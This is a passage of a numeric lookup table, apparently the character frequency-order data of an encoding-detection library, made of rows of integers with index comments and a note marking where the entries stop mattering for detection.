4306,5341, 472,3612,3496,1165,3315,4061,4062, 322,2153, 881, 455,1695,1152,1340, # 2848
660, 554,2154,4649,1058,4650,4307, 830,1065,3383,4063,4651,1924,5342,1703,1919, # 2864
5343, 932,2273, 122,5344,4652, 947, 677,5345,3870,2637, 297,1906,1925,2274,4653, # 2880
2322,3316,5346,5347,4308,5348,4309, 84,4310, 112, 989,5349, 547,1059,4064, 701, # 2896
3613,1019,5350,4311,5351,3497, 942, 639, 457,2306,2456, 993,2966, 407, 851, 494, # 2912
4654,3384, 927,5352,1237,5353,2426,3385, 573,4312, 680, 921,2925,1279,1875, 285, # 2928
790,1448,1984, 719,2168,5354,5355,4655,4065,4066,1649,5356,1541, 563,5357,1077, # 2944
5358,3386,3061,3498, 511,3015,4067,4068,3733,4069,1268,2572,3387,3238,4656,4657, # 2960
5359, 535,1048,1276,1189,2926,2029,3167,1438,1373,2847,2967,1134,2013,5360,4313, # 2976
1238,2586,3109,1259,5361, 700,5362,2968,3168,3734,4314,5363,4315,1146,1876,1907, # 2992
4658,2611,4070, 781,2427, 132,1589, 203, 147, 273,2802,2407, 898,1787,2155,4071, # 3008
4072,5364,3871,2803,5365,5366,4659,4660,5367,3239,5368,1635,3872, 965,5369,1805, # 3024
2699,1516,3614,1121,1082,1329,3317,4073,1449,3873, 65,1128,2848,2927,2769,1590, # 3040
3874,5370,5371, 12,2668, 45, 976,2587,3169,4661, 517,2535,1013,1037,3240,5372, # 3056
3875,2849,5373,3876,5374,3499,5375,2612, 614,1999,2323,3877,3110,2733,2638,5376, # 3072
2588,4316, 599,1269,5377,1811,3735,5378,2700,3111, 759,1060, 489,1806,3388,3318, # 3088
1358,5379,5380,2391,1387,1215,2639,2256, 490,5381,5382,4317,1759,2392,2348,5383, # 3104
4662,3878,1908,4074,2640,1807,3241,4663,3500,3319,2770,2349, 874,5384,5385,3501, # 3120
3736,1859, 91,2928,3737,3062,3879,4664,5386,3170,4075,2669,5387,3502,1202,1403, # 3136
3880,2969,2536,1517,2510,4665,3503,2511,5388,4666,5389,2701,1886,1495,1731,4076, # 3152
2370,4667,5390,2030,5391,5392,4077,2702,1216, 237,2589,4318,2324,4078,3881,4668, # 3168
4669,2703,3615,3504, 445,4670,5393,5394,5395,5396,2771, 61,4079,3738,1823,4080, # 3184
5397, 687,2046, 935, 925, 405,2670, 703,1096,1860,2734,4671,4081,1877,1367,2704, # 3200
3389, 918,2106,1782,2483, 334,3320,1611,1093,4672, 564,3171,3505,3739,3390, 945, # 3216
2641,2058,4673,5398,1926, 872,4319,5399,3506,2705,3112, 349,4320,3740,4082,4674, # 3232
3882,4321,3741,2156,4083,4675,4676,4322,4677,2408,2047, 782,4084, 400, 251,4323, # 3248
1624,5400,5401, 277,3742, 299,1265, 476,1191,3883,2122,4324,4325,1109, 205,5402, # 3264
2590,1000,2157,3616,1861,5403,5404,5405,4678,5406,4679,2573, 107,2484,2158,4085, # 3280
3507,3172,5407,1533, 541,1301, 158, 753,4326,2886,3617,5408,1696, 370,1088,4327, # 3296
4680,3618, 579, 327, 440, 162,2244, 269,1938,1374,3508, 968,3063, 56,1396,3113, # 3312
2107,3321,3391,5409,1927,2159,4681,3016,5410,3619,5411,5412,3743,4682,2485,5413, # 3328
2804,5414,1650,4683,5415,2613,5416,5417,4086,2671,3392,1149,3393,4087,3884,4088, # 3344
5418,1076, 49,5419, 951,3242,3322,3323, 450,2850, 920,5420,1812,2805,2371,4328, # 3360
1909,1138,2372,3885,3509,5421,3243,4684,1910,1147,1518,2428,4685,3886,5422,4686, # 3376
2393,2614, 260,1796,3244,5423,5424,3887,3324, 708,5425,3620,1704,5426,3621,1351, # 3392
1618,3394,3017,1887, 944,4329,3395,4330,3064,3396,4331,5427,3744, 422, 413,1714, # 3408
3325, 500,2059,2350,4332,2486,5428,1344,1911, 954,5429,1668,5430,5431,4089,2409, # 3424
4333,3622,3888,4334,5432,2307,1318,2512,3114, 133,3115,2887,4687, 629, 31,2851, # 3440
2706,3889,4688, 850, 949,4689,4090,2970,1732,2089,4335,1496,1853,5433,4091, 620, # 3456
3245, 981,1242,3745,3397,1619,3746,1643,3326,2140,2457,1971,1719,3510,2169,5434, # 3472
3246,5435,5436,3398,1829,5437,1277,4690,1565,2048,5438,1636,3623,3116,5439, 869, # 3488
2852, 655,3890,3891,3117,4092,3018,3892,1310,3624,4691,5440,5441,5442,1733, 558, # 3504
4692,3747, 335,1549,3065,1756,4336,3748,1946,3511,1830,1291,1192, 470,2735,2108, # 3520
2806, 913,1054,4093,5443,1027,5444,3066,4094,4693, 982,2672,3399,3173,3512,3247, # 3536
3248,1947,2807,5445, 571,4694,5446,1831,5447,3625,2591,1523,2429,5448,2090, 984, # 3552
4695,3749,1960,5449,3750, 852, 923,2808,3513,3751, 969,1519, 999,2049,2325,1705, # 3568
5450,3118, 615,1662, 151, 597,4095,2410,2326,1049, 275,4696,3752,4337, 568,3753, # 3584
3626,2487,4338,3754,5451,2430,2275, 409,3249,5452,1566,2888,3514,1002, 769,2853, # 3600
194,2091,3174,3755,2226,3327,4339, 628,1505,5453,5454,1763,2180,3019,4096, 521, # 3616
1161,2592,1788,2206,2411,4697,4097,1625,4340,4341, 412, 42,3119, 464,5455,2642, # 3632
4698,3400,1760,1571,2889,3515,2537,1219,2207,3893,2643,2141,2373,4699,4700,3328, # 3648
1651,3401,3627,5456,5457,3628,2488,3516,5458,3756,5459,5460,2276,2092, 460,5461, # 3664
4701,5462,3020, 962, 588,3629, 289,3250,2644,1116, 52,5463,3067,1797,5464,5465, # 3680
5466,1467,5467,1598,1143,3757,4342,1985,1734,1067,4702,1280,3402, 465,4703,1572, # 3696
510,5468,1928,2245,1813,1644,3630,5469,4704,3758,5470,5471,2673,1573,1534,5472, # 3712
5473, 536,1808,1761,3517,3894,3175,2645,5474,5475,5476,4705,3518,2929,1912,2809, # 3728
5477,3329,1122, 377,3251,5478, 360,5479,5480,4343,1529, 551,5481,2060,3759,1769, # 3744
2431,5482,2930,4344,3330,3120,2327,2109,2031,4706,1404, 136,1468,1479, 672,1171, # 3760
3252,2308, 271,3176,5483,2772,5484,2050, 678,2736, 865,1948,4707,5485,2014,4098, # 3776
2971,5486,2737,2227,1397,3068,3760,4708,4709,1735,2931,3403,3631,5487,3895, 509, # 3792
2854,2458,2890,3896,5488,5489,3177,3178,4710,4345,2538,4711,2309,1166,1010, 552, # 3808
681,1888,5490,5491,2972,2973,4099,1287,1596,1862,3179, 358, 453, 736, 175, 478, # 3824
1117, 905,1167,1097,5492,1854,1530,5493,1706,5494,2181,3519,2292,3761,3520,3632, # 3840
4346,2093,4347,5495,3404,1193,2489,4348,1458,2193,2208,1863,1889,1421,3331,2932, # 3856
3069,2182,3521, 595,2123,5496,4100,5497,5498,4349,1707,2646, 223,3762,1359, 751, # 3872
3121, 183,3522,5499,2810,3021, 419,2374, 633, 704,3897,2394, 241,5500,5501,5502, # 3888
838,3022,3763,2277,2773,2459,3898,1939,2051,4101,1309,3122,2246,1181,5503,1136, # 3904
2209,3899,2375,1446,4350,2310,4712,5504,5505,4351,1055,2615, 484,3764,5506,4102, # 3920
625,4352,2278,3405,1499,4353,4103,5507,4104,4354,3253,2279,2280,3523,5508,5509, # 3936
2774, 808,2616,3765,3406,4105,4355,3123,2539, 526,3407,3900,4356, 955,5510,1620, # 3952
4357,2647,2432,5511,1429,3766,1669,1832, 994, 928,5512,3633,1260,5513,5514,5515, # 3968
1949,2293, 741,2933,1626,4358,2738,2460, 867,1184, 362,3408,1392,5516,5517,4106, # 3984
4359,1770,1736,3254,2934,4713,4714,1929,2707,1459,1158,5518,3070,3409,2891,1292, # 4000
1930,2513,2855,3767,1986,1187,2072,2015,2617,4360,5519,2574,2514,2170,3768,2490, # 4016
3332,5520,3769,4715,5521,5522, 666,1003,3023,1022,3634,4361,5523,4716,1814,2257, # 4032
574,3901,1603, 295,1535, 705,3902,4362, 283, 858, 417,5524,5525,3255,4717,4718, # 4048
3071,1220,1890,1046,2281,2461,4107,1393,1599, 689,2575, 388,4363,5526,2491, 802, # 4064
5527,2811,3903,2061,1405,2258,5528,4719,3904,2110,1052,1345,3256,1585,5529, 809, # 4080
5530,5531,5532, 575,2739,3524, 956,1552,1469,1144,2328,5533,2329,1560,2462,3635, # 4096
3257,4108, 616,2210,4364,3180,2183,2294,5534,1833,5535,3525,4720,5536,1319,3770, # 4112
3771,1211,3636,1023,3258,1293,2812,5537,5538,5539,3905, 607,2311,3906, 762,2892, # 4128
1439,4365,1360,4721,1485,3072,5540,4722,1038,4366,1450,2062,2648,4367,1379,4723, # 4144
2593,5541,5542,4368,1352,1414,2330,2935,1172,5543,5544,3907,3908,4724,1798,1451, # 4160
5545,5546,5547,5548,2936,4109,4110,2492,2351, 411,4111,4112,3637,3333,3124,4725, # 4176
1561,2674,1452,4113,1375,5549,5550, 47,2974, 316,5551,1406,1591,2937,3181,5552, # 4192
1025,2142,3125,3182, 354,2740, 884,2228,4369,2412, 508,3772, 726,3638, 996,2433, # 4208
3639, 729,5553, 392,2194,1453,4114,4726,3773,5554,5555,2463,3640,2618,1675,2813, # 4224
919,2352,2975,2353,1270,4727,4115, 73,5556,5557, 647,5558,3259,2856,2259,1550, # 4240
1346,3024,5559,1332, 883,3526,5560,5561,5562,5563,3334,2775,5564,1212, 831,1347, # 4256
4370,4728,2331,3909,1864,3073, 720,3910,4729,4730,3911,5565,4371,5566,5567,4731, # 4272
5568,5569,1799,4732,3774,2619,4733,3641,1645,2376,4734,5570,2938, 669,2211,2675, # 4288
2434,5571,2893,5572,5573,1028,3260,5574,4372,2413,5575,2260,1353,5576,5577,4735, # 4304
3183, 518,5578,4116,5579,4373,1961,5580,2143,4374,5581,5582,3025,2354,2355,3912, # 4320
516,1834,1454,4117,2708,4375,4736,2229,2620,1972,1129,3642,5583,2776,5584,2976, # 4336
1422, 577,1470,3026,1524,3410,5585,5586, 432,4376,3074,3527,5587,2594,1455,2515, # 4352
2230,1973,1175,5588,1020,2741,4118,3528,4737,5589,2742,5590,1743,1361,3075,3529, # 4368
2649,4119,4377,4738,2295, 895, 924,4378,2171, 331,2247,3076, 166,1627,3077,1098, # 4384
5591,1232,2894,2231,3411,4739, 657, 403,1196,2377, 542,3775,3412,1600,4379,3530, # 4400
5592,4740,2777,3261, 576, 530,1362,4741,4742,2540,2676,3776,4120,5593, 842,3913, # 4416
5594,2814,2032,1014,4121, 213,2709,3413, 665, 621,4380,5595,3777,2939,2435,5596, # 4432
2436,3335,3643,3414,4743,4381,2541,4382,4744,3644,1682,4383,3531,1380,5597, 724, # 4448
2282, 600,1670,5598,1337,1233,4745,3126,2248,5599,1621,4746,5600, 651,4384,5601, # 4464
1612,4385,2621,5602,2857,5603,2743,2312,3078,5604, 716,2464,3079, 174,1255,2710, # 4480
4122,3645, 548,1320,1398, 728,4123,1574,5605,1891,1197,3080,4124,5606,3081,3082, # 4496
3778,3646,3779, 747,5607, 635,4386,4747,5608,5609,5610,4387,5611,5612,4748,5613, # 4512
3415,4749,2437, 451,5614,3780,2542,2073,4388,2744,4389,4125,5615,1764,4750,5616, # 4528
4390, 350,4751,2283,2395,2493,5617,4391,4126,2249,1434,4127, 488,4752, 458,4392, # 4544
4128,3781, 771,1330,2396,3914,2576,3184,2160,2414,1553,2677,3185,4393,5618,2494, # 4560
2895,2622,1720,2711,4394,3416,4753,5619,2543,4395,5620,3262,4396,2778,5621,2016, # 4576
2745,5622,1155,1017,3782,3915,5623,3336,2313, 201,1865,4397,1430,5624,4129,5625, # 4592
5626,5627,5628,5629,4398,1604,5630, 414,1866, 371,2595,4754,4755,3532,2017,3127, # 4608
4756,1708, 960,4399, 887, 389,2172,1536,1663,1721,5631,2232,4130,2356,2940,1580, # 4624
5632,5633,1744,4757,2544,4758,4759,5634,4760,5635,2074,5636,4761,3647,3417,2896, # 4640
4400,5637,4401,2650,3418,2815, 673,2712,2465, 709,3533,4131,3648,4402,5638,1148, # 4656
502, 634,5639,5640,1204,4762,3649,1575,4763,2623,3783,5641,3784,3128, 948,3263, # 4672
121,1745,3916,1110,5642,4403,3083,2516,3027,4132,3785,1151,1771,3917,1488,4133, # 4688
1987,5643,2438,3534,5644,5645,2094,5646,4404,3918,1213,1407,2816, 531,2746,2545, # 4704
3264,1011,1537,4764,2779,4405,3129,1061,5647,3786,3787,1867,2897,5648,2018, 120, # 4720
4406,4407,2063,3650,3265,2314,3919,2678,3419,1955,4765,4134,5649,3535,1047,2713, # 4736
1266,5650,1368,4766,2858, 649,3420,3920,2546,2747,1102,2859,2679,5651,5652,2000, # 4752
5653,1111,3651,2977,5654,2495,3921,3652,2817,1855,3421,3788,5655,5656,3422,2415, # 4768
2898,3337,3266,3653,5657,2577,5658,3654,2818,4135,1460, 856,5659,3655,5660,2899, # 4784
2978,5661,2900,3922,5662,4408, 632,2517, 875,3923,1697,3924,2296,5663,5664,4767, # 4800
3028,1239, 580,4768,4409,5665, 914, 936,2075,1190,4136,1039,2124,5666,5667,5668, # 4816
5669,3423,1473,5670,1354,4410,3925,4769,2173,3084,4137, 915,3338,4411,4412,3339, # 4832
1605,1835,5671,2748, 398,3656,4413,3926,4138, 328,1913,2860,4139,3927,1331,4414, # 4848
3029, 937,4415,5672,3657,4140,4141,3424,2161,4770,3425, 524, 742, 538,3085,1012, # 4864
5673,5674,3928,2466,5675, 658,1103, 225,3929,5676,5677,4771,5678,4772,5679,3267, # 4880
1243,5680,4142, 963,2250,4773,5681,2714,3658,3186,5682,5683,2596,2332,5684,4774, # 4896
5685,5686,5687,3536, 957,3426,2547,2033,1931,2941,2467, 870,2019,3659,1746,2780, # 4912
2781,2439,2468,5688,3930,5689,3789,3130,3790,3537,3427,3791,5690,1179,3086,5691, # 4928
3187,2378,4416,3792,2548,3188,3131,2749,4143,5692,3428,1556,2549,2297, 977,2901, # 4944
2034,4144,1205,3429,5693,1765,3430,3189,2125,1271, 714,1689,4775,3538,5694,2333, # 4960
3931, 533,4417,3660,2184, 617,5695,2469,3340,3539,2315,5696,5697,3190,5698,5699, # 4976
3932,1988, 618, 427,2651,3540,3431,5700,5701,1244,1690,5702,2819,4418,4776,5703, # 4992
3541,4777,5704,2284,1576, 473,3661,4419,3432, 972,5705,3662,5706,3087,5707,5708, # 5008
4778,4779,5709,3793,4145,4146,5710, 153,4780, 356,5711,1892,2902,4420,2144, 408, # 5024
803,2357,5712,3933,5713,4421,1646,2578,2518,4781,4782,3934,5714,3935,4422,5715, # 5040
2416,3433, 752,5716,5717,1962,3341,2979,5718, 746,3030,2470,4783,4423,3794, 698, # 5056
4784,1893,4424,3663,2550,4785,3664,3936,5719,3191,3434,5720,1824,1302,4147,2715, # 5072
3937,1974,4425,5721,4426,3192, 823,1303,1288,1236,2861,3542,4148,3435, 774,3938, # 5088
5722,1581,4786,1304,2862,3939,4787,5723,2440,2162,1083,3268,4427,4149,4428, 344, # 5104
1173, 288,2316, 454,1683,5724,5725,1461,4788,4150,2597,5726,5727,4789, 985, 894, # 5120
5728,3436,3193,5729,1914,2942,3795,1989,5730,2111,1975,5731,4151,5732,2579,1194, # 5136
425,5733,4790,3194,1245,3796,4429,5734,5735,2863,5736, 636,4791,1856,3940, 760, # 5152
1800,5737,4430,2212,1508,4792,4152,1894,1684,2298,5738,5739,4793,4431,4432,2213, # 5168
479,5740,5741, 832,5742,4153,2496,5743,2980,2497,3797, 990,3132, 627,1815,2652, # 5184
4433,1582,4434,2126,2112,3543,4794,5744, 799,4435,3195,5745,4795,2113,1737,3031, # 5200
1018, 543, 754,4436,3342,1676,4796,4797,4154,4798,1489,5746,3544,5747,2624,2903, # 5216
4155,5748,5749,2981,5750,5751,5752,5753,3196,4799,4800,2185,1722,5754,3269,3270, # 5232
1843,3665,1715, 481, 365,1976,1857,5755,5756,1963,2498,4801,5757,2127,3666,3271, # 5248
433,1895,2064,2076,5758, 602,2750,5759,5760,5761,5762,5763,3032,1628,3437,5764, # 5264
3197,4802,4156,2904,4803,2519,5765,2551,2782,5766,5767,5768,3343,4804,2905,5769, # 5280
4805,5770,2864,4806,4807,1221,2982,4157,2520,5771,5772,5773,1868,1990,5774,5775, # 5296
5776,1896,5777,5778,4808,1897,4158, 318,5779,2095,4159,4437,5780,5781, 485,5782, # 5312
938,3941, 553,2680, 116,5783,3942,3667,5784,3545,2681,2783,3438,3344,2820,5785, # 5328
3668,2943,4160,1747,2944,2983,5786,5787, 207,5788,4809,5789,4810,2521,5790,3033, # 5344
890,3669,3943,5791,1878,3798,3439,5792,2186,2358,3440,1652,5793,5794,5795, 941, # 5360
2299, 208,3546,4161,2020, 330,4438,3944,2906,2499,3799,4439,4811,5796,5797,5798, # 5376 #last 512
# Everything below is of no interest for detection purposes
2522,1613,4812,5799,3345,3945,2523,5800,4162,5801,1637,4163,2471,4813,3946,5802, # 5392
2500,3034,3800,5803,5804,2195,4814,5805,2163,5806,5807,5808,5809,5810,5811,5812, # 5408
5813,5814,5815,5816,5817,5818,5819,5820,5821,5822,5823,5824,5825,5826,5827,5828, # 5424
5829,5830,5831,5832,5833,5834,5835,5836,5837,5838,5839,5840,5841,5842,5843,5844, # 5440
5845,5846,5847,5848,5849,5850,5851,5852,5853,5854,5855,5856,5857,5858,5859,5860, # 5456
5861,5862,5863,5864,5865,5866,5867,5868,5869,5870,5871,5872,5873,5874,5875,5876, # 5472
5877,5878,5879,5880,5881,5882,5883,5884,5885,5886,5887,5888,5889,5890,5891,5892, # 5488
5893,5894,5895,5896,5897,5898,5899,5900,5901,5902,5903,5904,5905,5906,5907,5908, # 5504
5909,5910,5911,5912,5913,5914,5915,5916,5917,5918,5919,5920,5921,5922,5923,5924, # 5520
5925,5926,5927,5928,5929,5930,5931,5932,5933,5934,5935,5936,5937,5938,5939,5940, # 5536
5941,5942,5943,5944,5945,5946,5947,5948,5949,5950,5951,5952,5953,5954,5955,5956, # 5552
5957,5958,5959,5960,5961,5962,5963,5964,5965,5966,5967,5968,5969,5970,5971,5972, # 5568
5973,5974,5975,5976,5977,5978,5979,5980,5981,5982,5983,5984,5985,5986,5987,5988, # 5584
5989,5990,5991,5992,5993,5994,5995,5996,5997,5998,5999,6000,6001,6002,6003,6004, # 5600
6005,6006,6007,6008,6009,6010,6011,6012,6013,6014,6015,6016,6017,6018,6019,6020, # 5616
6021,6022,6023,6024,6025,6026,6027,6028,6029,6030,6031,6032,6033,6034,6035,6036, # 5632
6037,6038,6039,6040,6041,6042,6043,6044,6045,6046,6047,6048,6049,6050,6051,6052, # 5648
6053,6054,6055,6056,6057,6058,6059,6060,6061,6062,6063,6064,6065,6066,6067,6068, # 5664
6069,6070,6071,6072,6073,6074,6075,6076,6077,6078,6079,6080,6081,6082,6083,6084, # 5680
6085,6086,6087,6088,6089,6090,6091,6092,6093,6094,6095,6096,6097,6098,6099,6100, # 5696
6101,6102,6103,6104,6105,6106,6107,6108,6109,6110,6111,6112,6113,6114,6115,6116, # 5712
6117,6118,6119,6120,6121,6122,6123,6124,6125,6126,6127,6128,6129,6130,6131,6132, # 5728
6133,6134,6135,6136,6137,6138,6139,6140,6141,6142,6143,6144,6145,6146,6147,6148, # 5744
6149,6150,6151,6152,6153,6154,6155,6156,6157,6158,6159,6160,6161,6162,6163,6164, # 5760
6165,6166,6167,6168,6169,6170,6171,6172,6173,6174,6175,6176,6177,6178,6179,6180, # 5776
6181,6182,6183,6184,6185,6186,6187,6188,6189,6190,6191,6192,6193,6194,6195,6196, # 5792
6197,6198,6199,6200,6201,6202,6203,6204,6205,6206,6207,6208,6209,6210,6211,6212, # 5808
6213,6214,6215,6216,6217,6218,6219,6220,6221,6222,6223,3670,6224,6225,6226,6227, # 5824
6228,6229,6230,6231,6232,6233,6234,6235,6236,6237,6238,6239,6240,6241,6242,6243, # 5840
6244,6245,6246,6247,6248,6249,6250,6251,6252,6253,6254,6255,6256,6257,6258,6259, # 5856
6260,6261,6262,6263,6264,6265,6266,6267,6268,6269,6270,6271,6272,6273,6274,6275, # 5872
6276,6277,6278,6279,6280,6281,6282,6283,6284,6285,4815,6286,6287,6288,6289,6290, # 5888
6291,6292,4816,6293,6294,6295,6296,6297,6298,6299,6300,6301,6302,6303,6304,6305, # 5904
6306,6307,6308,6309,6310,6311,4817,4818,6312,6313,6314,6315,6316,6317,6318,4819, # 5920
6319,6320,6321,6322,6323,6324,6325,6326,6327,6328,6329,6330,6331,6332,6333,6334, # 5936
6335,6336,6337,4820,6338,6339,6340,6341,6342,6343,6344,6345,6346,6347,6348,6349, # 5952
6350,6351,6352,6353,6354,6355,6356,6357,6358,6359,6360,6361,6362,6363,6364,6365, # 5968
6366,6367,6368,6369,6370,6371,6372,6373,6374,6375,6376,6377,6378,6379,6380,6381, # 5984
6382,6383,6384,6385,6386,6387,6388,6389,6390,6391,6392,6393,6394,6395,6396,6397, # 6000
6398,6399,6400,6401,6402,6403,6404,6405,6406,6407,6408,6409,6410,3441,6411,6412, # 6016
6413,6414,6415,6416,6417,6418,6419,6420,6421,6422,6423,6424,6425,4440,6426,6427, # 6032
6428,6429,6430,6431,6432,6433,6434,6435,6436,6437,6438,6439,6440,6441,6442,6443, # 6048
6444,6445,6446,6447,6448,6449,6450,6451,6452,6453,6454,4821,6455,6456,6457,6458, # 6064
6459,6460,6461,6462,6463,6464,6465,6466,6467,6468,6469,6470,6471,6472,6473,6474, # 6080
6475,6476,6477,3947,3948,6478,6479,6480,6481,3272,4441,6482,6483,6484,6485,4442, # 6096
6486,6487,6488,6489,6490,6491,6492,6493,6494,6495,6496,4822,6497,6498,6499,6500, # 6112
6501,6502,6503,6504,6505,6506,6507,6508,6509,6510,6511,6512,6513,6514,6515,6516, # 6128
6517,6518,6519,6520,6521,6522,6523,6524,6525,6526,6527,6528,6529,6530,6531,6532, # 6144
6533,6534,6535,6536,6537,6538,6539,6540,6541,6542,6543,6544,6545,6546,6547,6548, # 6160
6549,6550,6551,6552,6553,6554,6555,6556,2784,6557,4823,6558,6559,6560,6561,6562, # 6176
6563,6564,6565,6566,6567,6568,6569,3949,6570,6571,6572,4824,6573,6574,6575,6576, # 6192
6577,6578,6579,6580,6581,6582,6583,4825,6584,6585,6586,3950,2785,6587,6588,6589, # 6208
6590,6591,6592,6593,6594,6595,6596,6597,6598,6599,6600,6601,6602,6603,6604,6605, # 6224
6606,6607,6608,6609,6610,6611,6612,4826,6613,6614,6615,4827,6616,6617,6618,6619, # 6240
6620,6621,6622,6623,6624,6625,4164,6626,6627,6628,6629,6630,6631,6632,6633,6634, # 6256
3547,6635,4828,6636,6637,6638,6639,6640,6641,6642,3951,2984,6643,6644,6645,6646, # 6272
6647,6648,6649,4165,6650,4829,6651,6652,4830,6653,6654,6655,6656,6657,6658,6659, # 6288
6660,6661,6662,4831,6663,6664,6665,6666,6667,6668,6669,6670,6671,4166,6672,4832, # 6304
3952,6673,6674,6675,6676,4833,6677,6678,6679,4167,6680,6681,6682,3198,6683,6684, # 6320
6685,6686,6687,6688,6689,6690,6691,6692,6693,6694,6695,6696,6697,4834,6698,6699, # 6336
6700,6701,6702,6703,6704,6705,6706,6707,6708,6709,6710,6711,6712,6713,6714,6715, # 6352
6716,6717,6718,6719,6720,6721,6722,6723,6724,6725,6726,6727,6728,6729,6730,6731, # 6368
6732,6733,6734,4443,6735,6736,6737,6738,6739,6740,6741,6742,6743,6744,6745,4444, # 6384
6746,6747,6748,6749,6750,6751,6752,6753,6754,6755,6756,6757,6758,6759,6760,6761, # 6400
6762,6763,6764,6765,6766,6767,6768,6769,6770,6771,6772,6773,6774,6775,6776,6777, # 6416
6778,6779,6780,6781,4168,6782,6783,3442,6784,6785,6786,6787,6788,6789,6790,6791, # 6432
4169,6792,6793,6794,6795,6796,6797,6798,6799,6800,6801,6802,6803,6804,6805,6806, # 6448
6807,6808,6809,6810,6811,4835,6812,6813,6814,4445,6815,6816,4446,6817,6818,6819, # 6464
6820,6821,6822,6823,6824,6825,6826,6827,6828,6829,6830,6831,6832,6833,6834,6835, # 6480
3548,6836,6837,6838,6839,6840,6841,6842,6843,6844,6845,6846,4836,6847,6848,6849, # 6496
6850,6851,6852,6853,6854,3953,6855,6856,6857,6858,6859,6860,6861,6862,6863,6864, # 6512
6865,6866,6867,6868,6869,6870,6871,6872,6873,6874,6875,6876,6877,3199,6878,6879, # 6528
6880,6881,6882,4447,6883,6884,6885,6886,6887,6888,6889,6890,6891,6892,6893,6894, # 6544
6895,6896,6897,6898,6899,6900,6901,6902,6903,6904,4170,6905,6906,6907,6908,6909, # 6560
6910,6911,6912,6913,6914,6915,6916,6917,6918,6919,6920,6921,6922,6923,6924,6925, # 6576
6926,6927,4837,6928,6929,6930,6931,6932,6933,6934,6935,6936,3346,6937,6938,4838, # 6592
6939,6940,6941,4448,6942,6943,6944,6945,6946,4449,6947,6948,6949,6950,6951,6952, # 6608
6953,6954,6955,6956,6957,6958,6959,6960,6961,6962,6963,6964,6965,6966,6967,6968, # 6624
6969,6970,6971,6972,6973,6974,6975,6976,6977,6978,6979,6980,6981,6982,6983,6984, # 6640
6985,6986,6987,6988,6989,6990,6991,6992,6993,6994,3671,6995,6996,6997,6998,4839, # 6656
6999,7000,7001,7002,3549,7003,7004,7005,7006,7007,7008,7009,7010,7011,7012,7013, # 6672
7014,7015,7016,7017,7018,7019,7020,7021,7022,7023,7024,7025,7026,7027,7028,7029, # 6688
7030,4840,7031,7032,7033,7034,7035,7036,7037,7038,4841,7039,7040,7041,7042,7043, # 6704
7044,7045,7046,7047,7048,7049,7050,7051,7052,7053,7054,7055,7056,7057,7058,7059, # 6720
7060,7061,7062,7063,7064,7065,7066,7067,7068,7069,7070,2985,7071,7072,7073,7074, # 6736
7075,7076,7077,7078,7079,7080,4842,7081,7082,7083,7084,7085,7086,7087,7088,7089, # 6752
7090,7091,7092,7093,7094,7095,7096,7097,7098,7099,7100,7101,7102,7103,7104,7105, # 6768
7106,7107,7108,7109,7110,7111,7112,7113,7114,7115,7116,7117,7118,4450,7119,7120, # 6784
7121,7122,7123,7124,7125,7126,7127,7128,7129,7130,7131,7132,7133,7134,7135,7136, # 6800
7137,7138,7139,7140,7141,7142,7143,4843,7144,7145,7146,7147,7148,7149,7150,7151, # 6816
7152,7153,7154,7155,7156,7157,7158,7159,7160,7161,7162,7163,7164,7165,7166,7167, # 6832
7168,7169,7170,7171,7172,7173,7174,7175,7176,7177,7178,7179,7180,7181,7182,7183, # 6848
7184,7185,7186,7187,7188,4171,4172,7189,7190,7191,7192,7193,7194,7195,7196,7197, # 6864
7198,7199,7200,7201,7202,7203,7204,7205,7206,7207,7208,7209,7210,7211,7212,7213, # 6880
7214,7215,7216,7217,7218,7219,7220,7221,7222,7223,7224,7225,7226,7227,7228,7229, # 6896
7230,7231,7232,7233,7234,7235,7236,7237,7238,7239,7240,7241,7242,7243,7244,7245, # 6912
7246,7247,7248,7249,7250,7251,7252,7253,7254,7255,7256,7257,7258,7259,7260,7261, # 6928
7262,7263,7264,7265,7266,7267,7268,7269,7270,7271,7272,7273,7274,7275,7276,7277, # 6944
7278,7279,7280,7281,7282,7283,7284,7285,7286,7287,7288,7289,7290,7291,7292,7293, # 6960
7294,7295,7296,4844,7297,7298,7299,7300,7301,7302,7303,7304,7305,7306,7307,7308, # 6976
7309,7310,7311,7312,7313,7314,7315,7316,4451,7317,7318,7319,7320,7321,7322,7323, # 6992
7324,7325,7326,7327,7328,7329,7330,7331,7332,7333,7334,7335,7336,7337,7338,7339, # 7008
7340,7341,7342,7343,7344,7345,7346,7347,7348,7349,7350,7351,7352,7353,4173,7354, # 7024
7355,4845,7356,7357,7358,7359,7360,7361,7362,7363,7364,7365,7366,7367,7368,7369, # 7040
7370,7371,7372,7373,7374,7375,7376,7377,7378,7379,7380,7381,7382,7383,7384,7385, # 7056
7386,7387,7388,4846,7389,7390,7391,7392,7393,7394,7395,7396,7397,7398,7399,7400, # 7072
7401,7402,7403,7404,7405,3672,7406,7407,7408,7409,7410,7411,7412,7413,7414,7415, # 7088
7416,7417,7418,7419,7420,7421,7422,7423,7424,7425,7426,7427,7428,7429,7430,7431, # 7104
7432,7433,7434,7435,7436,7437,7438,7439,7440,7441,7442,7443,7444,7445,7446,7447, # 7120
7448,7449,7450,7451,7452,7453,4452,7454,3200,7455,7456,7457,7458,7459,7460,7461, # 7136
7462,7463,7464,7465,7466,7467,7468,7469,7470,7471,7472,7473,7474,4847,7475,7476, # 7152
7477,3133,7478,7479,7480,7481,7482,7483,7484,7485,7486,7487,7488,7489,7490,7491, # 7168
7492,7493,7494,7495,7496,7497,7498,7499,7500,7501,7502,3347,7503,7504,7505,7506, # 7184
7507,7508,7509,7510,7511,7512,7513,7514,7515,7516,7517,7518,7519,7520,7521,4848, # 7200
7522,7523,7524,7525,7526,7527,7528,7529,7530,7531,7532,7533,7534,7535,7536,7537, # 7216
7538,7539,7540,7541,7542,7543,7544,7545,7546,7547,7548,7549,3801,4849,7550,7551, # 7232
7552,7553,7554,7555,7556,7557,7558,7559,7560,7561,7562,7563,7564,7565,7566,7567, # 7248
7568,7569,3035,7570,7571,7572,7573,7574,7575,7576,7577,7578,7579,7580,7581,7582, # 7264
7583,7584,7585,7586,7587,7588,7589,7590,7591,7592,7593,7594,7595,7596,7597,7598, # 7280
7599,7600,7601,7602,7603,7604,7605,7606,7607,7608,7609,7610,7611,7612,7613,7614, # 7296
7615,7616,4850,7617,7618,3802,7619,7620,7621,7622,7623,7624,7625,7626,7627,7628, # 7312
7629,7630,7631,7632,4851,7633,7634,7635,7636,7637,7638,7639,7640,7641,7642,7643, # 7328
7644,7645,7646,7647,7648,7649,7650,7651,7652,7653,7654,7655,7656,7657,7658,7659, # 7344
